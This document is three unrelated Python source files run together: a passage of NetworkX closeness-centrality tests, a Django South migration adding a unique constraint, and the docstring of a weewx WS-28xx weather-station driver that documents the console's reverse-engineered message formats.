        d = {0: 0.0, 1: 0.500, 2: 0.667}
        dr = {0: 0.667, 1: 0.500, 2: 0.0}
        for n in sorted(self.P3):
            assert almost_equal(c[n], d[n], places=3)
            assert almost_equal(cr[n], dr[n], places=3)

    def test_k5_closeness(self):
        c = nx.closeness_centrality(self.K5)
        d = {0: 1.000, 1: 1.000, 2: 1.000, 3: 1.000, 4: 1.000}
        for n in sorted(self.K5):
            assert almost_equal(c[n], d[n], places=3)

    def test_p3_closeness(self):
        c = nx.closeness_centrality(self.P3)
        d = {0: 0.667, 1: 1.000, 2: 0.667}
        for n in sorted(self.P3):
            assert almost_equal(c[n], d[n], places=3)

    def test_krackhardt_closeness(self):
        c = nx.closeness_centrality(self.K)
        d = {
            0: 0.529,
            1: 0.529,
            2: 0.500,
            3: 0.600,
            4: 0.500,
            5: 0.643,
            6: 0.643,
            7: 0.600,
            8: 0.429,
            9: 0.310,
        }
        for n in sorted(self.K):
            assert almost_equal(c[n], d[n], places=3)

    def test_florentine_families_closeness(self):
        c = nx.closeness_centrality(self.F)
        d = {
            "Acciaiuoli": 0.368,
            "Albizzi": 0.483,
            "Barbadori": 0.4375,
            "Bischeri": 0.400,
            "Castellani": 0.389,
            "Ginori": 0.333,
            "Guadagni": 0.467,
            "Lamberteschi": 0.326,
            "Medici": 0.560,
            "Pazzi": 0.286,
            "Peruzzi": 0.368,
            "Ridolfi": 0.500,
            "Salviati": 0.389,
            "Strozzi": 0.4375,
            "Tornabuoni": 0.483,
        }
        for n in sorted(self.F):
            assert almost_equal(c[n], d[n], places=3)

    def test_les_miserables_closeness(self):
        c = nx.closeness_centrality(self.LM)
        d = {
            "Napoleon": 0.302,
            "Myriel": 0.429,
            "MlleBaptistine": 0.413,
            "MmeMagloire": 0.413,
            "CountessDeLo": 0.302,
            "Geborand": 0.302,
            "Champtercier": 0.302,
            "Cravatte": 0.302,
            "Count": 0.302,
            "OldMan": 0.302,
            "Valjean": 0.644,
            "Labarre": 0.394,
            "Marguerite": 0.413,
            "MmeDeR": 0.394,
            "Isabeau": 0.394,
            "Gervais": 0.394,
            "Listolier": 0.341,
            "Tholomyes": 0.392,
            "Fameuil": 0.341,
            "Blacheville": 0.341,
            "Favourite": 0.341,
            "Dahlia": 0.341,
            "Zephine": 0.341,
            "Fantine": 0.461,
            "MmeThenardier": 0.461,
            "Thenardier": 0.517,
            "Cosette": 0.478,
            "Javert": 0.517,
            "Fauchelevent": 0.402,
            "Bamatabois": 0.427,
            "Perpetue": 0.318,
            "Simplice": 0.418,
            "Scaufflaire": 0.394,
            "Woman1": 0.396,
            "Judge": 0.404,
            "Champmathieu": 0.404,
            "Brevet": 0.404,
            "Chenildieu": 0.404,
            "Cochepaille": 0.404,
            "Pontmercy": 0.373,
            "Boulatruelle": 0.342,
            "Eponine": 0.396,
            "Anzelma": 0.352,
            "Woman2": 0.402,
            "MotherInnocent": 0.398,
            "Gribier": 0.288,
            "MmeBurgon": 0.344,
            "Jondrette": 0.257,
            "Gavroche": 0.514,
            "Gillenormand": 0.442,
            "Magnon": 0.335,
            "MlleGillenormand": 0.442,
            "MmePontmercy": 0.315,
            "MlleVaubois": 0.308,
            "LtGillenormand": 0.365,
            "Marius": 0.531,
            "BaronessT": 0.352,
            "Mabeuf": 0.396,
            "Enjolras": 0.481,
            "Combeferre": 0.392,
            "Prouvaire": 0.357,
            "Feuilly": 0.392,
            "Courfeyrac": 0.400,
            "Bahorel": 0.394,
            "Bossuet": 0.475,
            "Joly": 0.394,
            "Grantaire": 0.358,
            "MotherPlutarch": 0.285,
            "Gueulemer": 0.463,
            "Babet": 0.463,
            "Claquesous": 0.452,
            "Montparnasse": 0.458,
            "Toussaint": 0.402,
            "Child1": 0.342,
            "Child2": 0.342,
            "Brujon": 0.380,
            "MmeHucheloup": 0.353,
        }
        for n in sorted(self.LM):
            assert almost_equal(c[n], d[n], places=3)

    def test_weighted_closeness(self):
        edges = [
            ("s", "u", 10),
            ("s", "x", 5),
            ("u", "v", 1),
            ("u", "x", 2),
            ("v", "y", 1),
            ("x", "u", 3),
            ("x", "v", 5),
            ("x", "y", 2),
            ("y", "s", 7),
            ("y", "v", 6),
        ]
        XG = nx.Graph()
        XG.add_weighted_edges_from(edges)
        c = nx.closeness_centrality(XG, distance="weight")
        d = {"y": 0.200, "x": 0.286, "s": 0.138, "u": 0.235, "v": 0.200}
        for n in sorted(XG):
            assert almost_equal(c[n], d[n], places=3)

    #
    # Tests for incremental closeness centrality.
    #
    @staticmethod
    def pick_add_edge(g):
        u = nx.utils.arbitrary_element(g)
        possible_nodes = set(g.nodes())
        neighbors = list(g.neighbors(u)) + [u]
        possible_nodes.difference_update(neighbors)
        v = nx.utils.arbitrary_element(possible_nodes)
        return (u, v)

    @staticmethod
    def pick_remove_edge(g):
        u = nx.utils.arbitrary_element(g)
        possible_nodes = list(g.neighbors(u))
        v = nx.utils.arbitrary_element(possible_nodes)
        return (u, v)

    def test_directed_raises(self):
        with pytest.raises(nx.NetworkXNotImplemented):
            dir_G = nx.gn_graph(n=5)
            prev_cc = None
            edge = self.pick_add_edge(dir_G)
            insert = True
            nx.incremental_closeness_centrality(dir_G, edge, prev_cc, insert)

    def test_wrong_size_prev_cc_raises(self):
        with pytest.raises(nx.NetworkXError):
            G = self.undirected_G.copy()
            edge = self.pick_add_edge(G)
            insert = True
            prev_cc = self.undirected_G_cc.copy()
            prev_cc.pop(0)
            nx.incremental_closeness_centrality(G, edge, prev_cc, insert)

    def test_wrong_nodes_prev_cc_raises(self):
        with pytest.raises(nx.NetworkXError):
            G = self.undirected_G.copy()
            edge = self.pick_add_edge(G)
            insert = True
            prev_cc = self.undirected_G_cc.copy()
            num_nodes = len(prev_cc)
            prev_cc.pop(0)
            prev_cc[num_nodes] = 0.5
            nx.incremental_closeness_centrality(G, edge, prev_cc, insert)

    def test_zero_centrality(self):
        G = nx.path_graph(3)
        prev_cc = nx.closeness_centrality(G)
        edge = self.pick_remove_edge(G)
        test_cc = nx.incremental_closeness_centrality(G, edge, prev_cc, insertion=False)
        G.remove_edges_from([edge])
        real_cc = nx.closeness_centrality(G)
        shared_items = set(test_cc.items()) & set(real_cc.items())
        assert len(shared_items) == len(real_cc)
        assert 0 in test_cc.values()

    def test_incremental(self):
        # Check that incremental and regular give same output
        G = self.undirected_G.copy()
        prev_cc = None
        for i in range(5):
            if i % 2 == 0:
                # Remove an edge
                insert = False
                edge = self.pick_remove_edge(G)
            else:
                # Add an edge
                insert = True
                edge = self.pick_add_edge(G)

            # start = timeit.default_timer()
            test_cc = nx.incremental_closeness_centrality(G, edge, prev_cc, insert)
            # inc_elapsed = (timeit.default_timer() - start)
            # print(f"incremental time: {inc_elapsed}")

            if insert:
                G.add_edges_from([edge])
            else:
                G.remove_edges_from([edge])

            # start = timeit.default_timer()
            real_cc = nx.closeness_centrality(G)
            # reg_elapsed = (timeit.default_timer() - start)
            # print(f"regular time: {reg_elapsed}")
            # Example output:
            # incremental time: 0.208
            # regular time: 0.276
            # incremental time: 0.00683
            # regular time: 0.260
            # incremental time: 0.0224
            # regular time: 0.278
            # incremental time: 0.00804
            # regular time: 0.208
            # incremental time: 0.00947
            # regular time: 0.188

            assert set(test_cc.items()) == set(real_cc.items())

            prev_cc = test_cc

# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding unique constraint on 'Vendeur', fields ['code_permanent']
        db.create_unique(u'encefal_vendeur', ['code_permanent'])


    def backwards(self, orm):
        # Removing unique constraint on 'Vendeur', fields ['code_permanent']
        db.delete_unique(u'encefal_vendeur', ['code_permanent'])


    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'encefal.exemplaire': {
            'Meta': {'object_name': 'Exemplaire'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'etat': ('django.db.models.fields.CharField', [], {'default': "'VENT'", 'max_length': '4'}),
            'facture': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'exemplaires'", 'null': 'True', 'db_column': "'facture'", 'to': u"orm['encefal.Facture']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'livre': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'livre'", 'to': u"orm['encefal.Livre']"}),
            'prix': ('django.db.models.fields.IntegerField', [], {}),
            'vendeur': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.facture': {
            'Meta': {'object_name': 'Facture'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'employe': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'employe'", 'to': u"orm['auth.User']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'session'", 'to': u"orm['encefal.Session']"})
        },
        u'encefal.livre': {
            'Meta': {'object_name': 'Livre'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'auteur': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'edition': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'isbn': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '13', 'blank': 'True'}),
            'titre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'vendeur': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'livres'", 'symmetrical': 'False', 'through': u"orm['encefal.Exemplaire']", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.session': {
            'Meta': {'object_name': 'Session'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_debut': ('django.db.models.fields.DateField', [], {}),
            'date_fin': ('django.db.models.fields.DateField', [], {}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
        },
        u'encefal.vendeur': {
            'Meta': {'object_name': 'Vendeur'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'code_permanent': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '12'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'telephone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
        }
    }

    complete_apps = ['encefal']
# $Id$
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Eddie De Pieri for the first Python implementation for WS-28xx.
# Eddie did the difficult work of decompiling HeavyWeather then converting
# and reverse engineering into a functional Python implementation.  Eddie's
# work was based on reverse engineering of HeavyWeather 2800 v 1.54
#
# Thanks to Lucas Heijst for enumerating the console message types and for
# debugging the transceiver/console communication timing issues.

"""Classes and functions for interfacing with WS-28xx weather stations.

LaCrosse makes a number of stations in the 28xx series, including:

  WS-2810, WS-2810U-IT
  WS-2811, WS-2811SAL-IT,  WS-2811BRN-IT,  WS-2811OAK-IT
  WS-2812, WS-2812U-IT
  WS-2813
  WS-2814, WS-2814U-IT
  WS-2815, WS-2815U-IT
  C86234

The station is also sold as the TFA Primus, TFA Opus, and TechnoLine.

HeavyWeather is the software provided by LaCrosse.

There are two versions of HeavyWeather for the WS-28xx series: 1.5.4 and 1.5.4b
Apparently there is a difference between TX59UN-1-IT and TX59U-IT models (this
identifier is printed on the thermo-hygro sensor).

   HeavyWeather Version    Firmware Version    Thermo-Hygro Model
   1.54                    333 or 332          TX59UN-1-IT
   1.54b                   288, 262, 222       TX59U-IT

HeavyWeather provides the following weather station settings:

  time display: 12|24 hour
  temperature display: C|F
  air pressure display: inhg|hpa
  wind speed display: m/s|knots|bft|km/h|mph
  rain display: mm|inch
  recording interval: 1m
  keep weather station in hi-speed communication mode: true/false

According to the HeavyWeatherPro User Manual (1.54, rev2), "Hi speed mode wears
down batteries on your display much faster, and similarly consumes more power
on the PC.  We do not believe most users need to enable this setting.  It was
provided at the request of users who prefer ultra-frequent uploads."

The HeavyWeatherPro 'CurrentWeather' view is updated as data arrive from the
console.  The console sends current weather data approximately every 13
seconds.

Historical data are updated less frequently - every 2 hours in the default
HeavyWeatherPro configuration.

According to the User Manual, "The 2800 series weather station uses the
'original' wind chill calculation rather than the 2001 'North American'
formula because the original formula is international."

Apparently the station console determines when data will be sent, and, once
paired, the transceiver is always listening.  The station console sends a
broadcast on the hour.  If the transceiver responds, the station console may
continue to broadcast data, depending on the transceiver response and the
timing of the transceiver response.

According to the C86234 Operations Manual (Revision 7):
 - Temperature and humidity data are sent to the console every 13 seconds.
 - Wind data are sent to the temperature/humidity sensor every 17 seconds.
 - Rain data are sent to the temperature/humidity sensor every 19 seconds.
 - Air pressure is measured every 15 seconds.

Each tip of the rain bucket is 0.26 mm of rain.

The following information was obtained by logging messages from the ws28xx.py
driver in weewx and by capturing USB messages between Heavy Weather Pro for
ws2800 and the TFA Primus Weather Station via windows program USB sniffer
busdog64_v0.2.1.

Pairing

The transceiver must be paired with a console before it can receive data.  Each
frame sent by the console includes the device identifier of the transceiver
with which it is paired.

Synchronizing

When the console and transceiver stop communicating, they can be synchronized
by one of the following methods:

- Push the SET button on the console
- Wait till the next full hour when the console sends a clock message

In each case a Request Time message is received by the transceiver from the
console. The 'Send Time to WS' message should be sent within ms (10 ms
typical). The transceiver should handle the 'Time SET' message then send a
'Time/Config written' message about 85 ms after the 'Send Time to WS' message.
When complete, the console and transceiver will have been synchronized.

Timing

Current Weather messages, History messages, getConfig/setConfig messages, and
setTime messages each have their own timing.  Missed History messages - as a
result of bad timing - result in console and transceiver becoming out of synch.

Current Weather

The console periodically sends Current Weather messages, each with the latest
values from the sensors.  The CommModeInterval determines how often the console
will send Current Weather messages.

History

The console records data periodically at an interval defined by the
HistoryInterval parameter.  The factory default setting is 2 hours.
Each history record contains a timestamp.  Timestamps use the time from the
console clock.  The console can record up to 1797 history records.

Reading 1795 history records took about 110 minutes on a raspberry pi, for
an average of 3.6 seconds per history record.

Reading 1795 history records took 65 minutes on a synology ds209+ii, for
an average of 2.2 seconds per history record.

Reading 1750 history records took 19 minutes using HeavyWeatherPro on a
Windows 7 64-bit laptop.

Message Types

The first byte of a message determines the message type.

ID   Type               Length

01   ?                  0x0f  (15)
d0   SetRX              0x15  (21)
d1   SetTX              0x15  (21)
d5   SetFrame           0x111 (273)
d6   GetFrame           0x111 (273)
d7   SetState           0x15  (21)
d8   SetPreamblePattern 0x15  (21)
d9   Execute            0x0f  (15)
dc   ReadConfigFlash<   0x15  (21)
dd   ReadConfigFlash>   0x15  (21)
de   GetState           0x0a  (10)
f0   WriteReg           0x05  (5)

In the following sections, some messages are decomposed using the following
structure:

  start   position in message buffer
  hi-lo   data starts on first (hi) or second (lo) nibble
  chars   data length in characters (nibbles)
  rem     remark
  name    variable

-------------------------------------------------------------------------------
1. 01 message (15 bytes)

000:  01 15 00 0b 08 58 3f 53 00 00   00 00 ff 15 0b (detected via USB sniffer)
000:  01 15 00 57 01 92 3f 53 00 00   00 00 ff 15 0a (detected via USB sniffer)

00:    messageID
02-15: ??

-------------------------------------------------------------------------------
2. SetRX message (21 bytes)

000:  d0 00 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00 00 00
020:  00 
  
00:    messageID
01-20: 00

-------------------------------------------------------------------------------
3. SetTX message (21 bytes)

000: d1 00 00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00 00 00
020: 00 
  
00:    messageID
01-20: 00

-------------------------------------------------------------------------------
4. SetFrame message (273 bytes)

Action:
00: rtGetHistory - Ask for History message
01: rtSetTime    - Ask for Send Time to weather station message
02: rtSetConfig  - Ask for Send Config to weather station message
03: rtGetConfig  - Ask for Config message
05: rtGetCurrent - Ask for Current Weather message
c0: Send Time    - Send Time to WS
40: Send Config  - Send Config to WS

000:  d5 00 09 DevID 00 CfgCS cIntThisAdr xx xx xx  rtGetHistory 
000:  d5 00 09 DevID 01 CfgCS cIntThisAdr xx xx xx  rtReqSetTime
000:  d5 00 09 f0 f0 02 CfgCS cIntThisAdr xx xx xx  rtReqFirstConfig
000:  d5 00 09 DevID 02 CfgCS cIntThisAdr xx xx xx  rtReqSetConfig
000:  d5 00 09 DevID 03 CfgCS cIntThisAdr xx xx xx  rtGetConfig
000:  d5 00 09 DevID 05 CfgCS cIntThisAdr xx xx xx  rtGetCurrent
000:  d5 00 0c DevID c0 CfgCS [TimeData . .. .. ..  Send Time
000:  d5 00 30 DevID 40 CfgCS [ConfigData .. .. ..  Send Config

All SetFrame messages:
00:    messageID
01:    00
02:    Message Length (starting with next byte)
03-04: DeviceID           [DevID]
05:    Action
06-07: Config checksum    [CfgCS]

Additional bytes rtGetCurrent, rtGetHistory, rtSetTime messages:
08-09hi: ComInt             [cINT]    1.5 bytes (high byte first)
09lo-11: ThisHistoryAddress [ThisAdr] 2.5 bytes (high byte first)

Additional bytes Send Time message:
08:    seconds
09:    minutes
10:    hours
11hi:  DayOfWeek
11lo:  day_lo         (low byte)
12hi:  month_lo       (low byte)
12lo:  day_hi         (high byte)
13hi:  (year-2000)_lo (low byte)
13lo:  month_hi       (high byte)
14lo:  (year-2000)_hi (high byte)

-------------------------------------------------------------------------------
5. GetFrame message

Response type:
20: WS SetTime / SetConfig - Data written
40: GetConfig
60: Current Weather
80: Actual / Outstanding History
a1: Request First-Time Config
a2: Request SetConfig
a3: Request SetTime

000:  00 00 06 DevID 20 64 CfgCS xx xx xx xx xx xx xx xx xx  Time/Config written
000:  00 00 30 DevID 40 64 [ConfigData .. .. .. .. .. .. ..  GetConfig
000:  00 00 d7 DevID 60 64 CfgCS [CurData .. .. .. .. .. ..  Current Weather
000:  00 00 1e DevID 80 64 CfgCS 0LateAdr 0ThisAdr [HisData  Outstanding History
000:  00 00 1e DevID 80 64 CfgCS 0LateAdr 0ThisAdr [HisData  Actual History
000:  00 00 06 DevID a1 64 CfgCS xx xx xx xx xx xx xx xx xx  Request FirstConfig
000:  00 00 06 DevID a2 64 CfgCS xx xx xx xx xx xx xx xx xx  Request SetConfig
000:  00 00 06 DevID a3 64 CfgCS xx xx xx xx xx xx xx xx xx  Request SetTime

ReadConfig example:  
000: 01 2e 40 5f 36 53 02 00 00 00  00 81 00 04 10 00 82 00 04 20
020: 00 71 41 72 42 00 05 00 00 00  27 10 00 02 83 60 96 01 03 07
040: 21 04 01 00 00 00 CfgCS

WriteConfig example:
000: 01 2e 40 64 36 53 02 00 00 00  00 00 10 04 00 81 00 20 04 00
020: 82 41 71 42 72 00 00 05 00 00  00 10 27 01 96 60 83 02 01 04
040: 21 07 03 10 00 00 CfgCS

00:    messageID
01:    00
02:    Message Length (starting with next byte)
03-04: DeviceID [devID]
05hi:  responseType
06:    Quality (in steps of 5)

Additional byte GetFrame messages except Request SetConfig and Request SetTime:
05lo:  BatteryStat 8=WS bat low; 4=TMP bat low; 2=RAIN bat low; 1=WIND bat low

Additional byte Request SetConfig and Request SetTime:
05lo:  RequestID

Additional bytes all GetFrame messages except ReadConfig and WriteConfig
07-08: Config checksum [CfgCS]

Additional bytes Outstanding History:
09lo-11: LatestHistoryAddress [LateAdr] 2.5 bytes (Latest to sent)
12lo-14: ThisHistoryAddress   [ThisAdr] 2.5 bytes (Outstanding)

Additional bytes Actual History:
09lo-11: LatestHistoryAddress [ThisAdr] 2.5 bytes (LatestHistoryAddress is the)
12lo-14: ThisHistoryAddress   [ThisAdr] 2.5 bytes (same as ThisHistoryAddress)

Additional bytes ReadConfig and WriteConfig
43-45: ResetMinMaxFlags (Output only; not included in checksum calculation)
46-47: Config checksum [CfgCS] (CheckSum = sum of bytes (00-42) + 7)

-------------------------------------------------------------------------------
6. SetState message

000:  d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01-14: 00

-------------------------------------------------------------------------------
7. SetPreamblePattern message

000:  d8 aa 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01:    ??
02-14: 00

-------------------------------------------------------------------------------
8. Execute message

000:  d9 05 00 00 00 00 00 00 00 00 00 00 00 00 00

00:    messageID
01:    ??
02-14: 00

-------------------------------------------------------------------------------
9. ReadConfigFlash in - receive data

000: dc 0a 01 f5 00 01 78 a0 01 02  0a 0c 0c 01 2e ff ff ff ff ff - freq correction
000: dc 0a 01 f9 01 02 0a 0c 0c 01  2e ff ff ff ff ff ff ff ff ff - transceiver data

00:    messageID
01:    length
02-03: address

Additional bytes frequency correction
05lo-07hi: frequency correction

Additional bytes transceiver data
05-10:     serial number
09-10:     DeviceID [devID]

-------------------------------------------------------------------------------
10. ReadConfigFlash out - ask for data

000: dd 0a 01 f5 cc cc cc cc cc cc  cc cc cc cc cc - Ask for freq correction
000: dd 0a 01 f9 cc cc cc cc cc cc  cc cc cc cc cc - Ask for transceiver data

00:    messageID
01:    length
02-03: address
04-14: cc

-------------------------------------------------------------------------------
11. GetState message

000:  de 14 00 00 00 00 (between SetPreamblePattern and first de16 message)
000:  de 15 00 00 00 00 Idle message
000:  de 16 00 00 00 00 Normal message
000:  de 0b 00 00 00 00 (detected via USB sniffer)

00:    messageID
01:    stateID
02-05: 00

-------------------------------------------------------------------------------
12. Writereg message

000: f0 08 01 00 00 - AX5051RegisterNames.IFMODE
000: f0 10 01 41 00 - AX5051RegisterNames.MODULATION
000: f0 11 01 07 00 - AX5051RegisterNames.ENCODING
...
000: f0 7b 01 88 00 - AX5051RegisterNames.TXRATEMID 
000: f0 7c 01 23 00 - AX5051RegisterNames.TXRATELO
000: f0 7d 01 35 00 - AX5051RegisterNames.TXDRIVER

00:    messageID
01:    register address
02:    01
03:    AX5051RegisterName
04:    00

-------------------------------------------------------------------------------
13. Current Weather message

start  hi-lo  chars  rem  name
0      hi     4           DevID
2      hi     2           Action
3      hi     2           Quality
4      hi     4           DeviceCS
6      hi     4      6    _AlarmRingingFlags
8      hi     1           _WeatherTendency
8      lo     1           _WeatherState
9      hi     1           not used
9      lo     10          _TempIndoorMinMax._Max._Time
14     lo     10          _TempIndoorMinMax._Min._Time
19     lo     5           _TempIndoorMinMax._Max._Value
22     hi     5           _TempIndoorMinMax._Min._Value
24     lo     5           _TempIndoor                           (C)
27     lo     10          _TempOutdoorMinMax._Max._Time
32     lo     10          _TempOutdoorMinMax._Min._Time
37     lo     5           _TempOutdoorMinMax._Max._Value
40     hi     5           _TempOutdoorMinMax._Min._Value
42     lo     5           _TempOutdoor                          (C)
45     hi     1           not used
45     lo     10     1    _WindchillMinMax._Max._Time
50     lo     10     2    _WindchillMinMax._Min._Time
55     lo     5      1    _WindchillMinMax._Max._Value
57     hi     5      1    _WindchillMinMax._Min._Value
60     lo     6           _Windchill                            (C)
63     hi     1           not used
63     lo     10          _DewpointMinMax._Max._Time
68     lo     10          _DewpointMinMax._Min._Time
73     lo     5           _DewpointMinMax._Max._Value
76     hi     5           _DewpointMinMax._Min._Value
78     lo     5           _Dewpoint                             (C)
81     hi     10          _HumidityIndoorMinMax._Max._Time
86     hi     10          _HumidityIndoorMinMax._Min._Time
91     hi     2           _HumidityIndoorMinMax._Max._Value
92     hi     2           _HumidityIndoorMinMax._Min._Value
93     hi     2           _HumidityIndoor                       (%)
94     hi     10          _HumidityOutdoorMinMax._Max._Time
99     hi     10          _HumidityOutdoorMinMax._Min._Time
104    hi     2           _HumidityOutdoorMinMax._Max._Value
105    hi     2           _HumidityOutdoorMinMax._Min._Value
106    hi     2           _HumidityOutdoor                      (%)
107    hi     10     3    _RainLastMonthMax._Time
112    hi     6      3    _RainLastMonthMax._Max._Value
115    hi     6           _RainLastMonth                        (mm)
118    hi     10     3    _RainLastWeekMax._Time
123    hi     6      3    _RainLastWeekMax._Max._Value
126    hi     6           _RainLastWeek                         (mm)
129    hi     10          _Rain24HMax._Time
134    hi     6           _Rain24HMax._Max._Value
137    hi     6           _Rain24H                              (mm)
140    hi     10          _Rain24HMax._Time
145    hi     6           _Rain24HMax._Max._Value
148    hi     6           _Rain24H                              (mm)
151    hi     1           not used
152    lo     10          _LastRainReset
158    lo     7           _RainTotal                            (mm)
160    hi     1           _WindDirection5
160    lo     1           _WindDirection4
161    hi     1           _WindDirection3
161    lo     1           _WindDirection2
162    hi     1           _WindDirection1
162    lo     1           _WindDirection                        (0-15)
163    hi     18          unknown data
172    hi     6           _WindSpeed                            (km/h)
175    hi     1           _GustDirection5
175    lo     1           _GustDirection4
176    hi     1           _GustDirection3
176    lo     1           _GustDirection2
177    hi     1           _GustDirection1
177    lo     1           _GustDirection                        (0-15)
178    hi     2           not used
179    hi     10          _GustMax._Max._Time
184    hi     6           _GustMax._Max._Value
187    hi     6           _Gust                                 (km/h)
190    hi     10     4    _PressureRelative_MinMax._Max/Min._Time
195    hi     5      5    _PressureRelative_inHgMinMax._Max._Value
197    lo     5      5    _PressureRelative_hPaMinMax._Max._Value
200    hi     5           _PressureRelative_inHgMinMax._Max._Value
202    lo     5           _PressureRelative_hPaMinMax._Max._Value
205    hi     5           _PressureRelative_inHgMinMax._Min._Value
207    lo     5           _PressureRelative_hPaMinMax._Min._Value
210    hi     5           _PressureRelative_inHg
212    lo     5           _PressureRelative_hPa

214    lo     430         end

Remarks
  1 since factory reset
  2 since software reset
  3 not used?
  4 should be: _PressureRelative_MinMax._Max._Time
  5 should be: _PressureRelative_MinMax._Min._Time
  6 _AlarmRingingFlags (values in hex)
    80 00 = Hi Al Gust
    40 00 = Al WindDir
    20 00 = One or more WindDirs set
    10 00 = Hi Al Rain24H
    08 00 = Hi Al Outdoor Humidity
    04 00 = Lo Al Outdoor Humidity
    02 00 = Hi Al Indoor Humidity
    01 00 = Lo Al Indoor Humidity
    00 80 = Hi Al Outdoor Temp
    00 40 = Lo Al Outdoor Temp
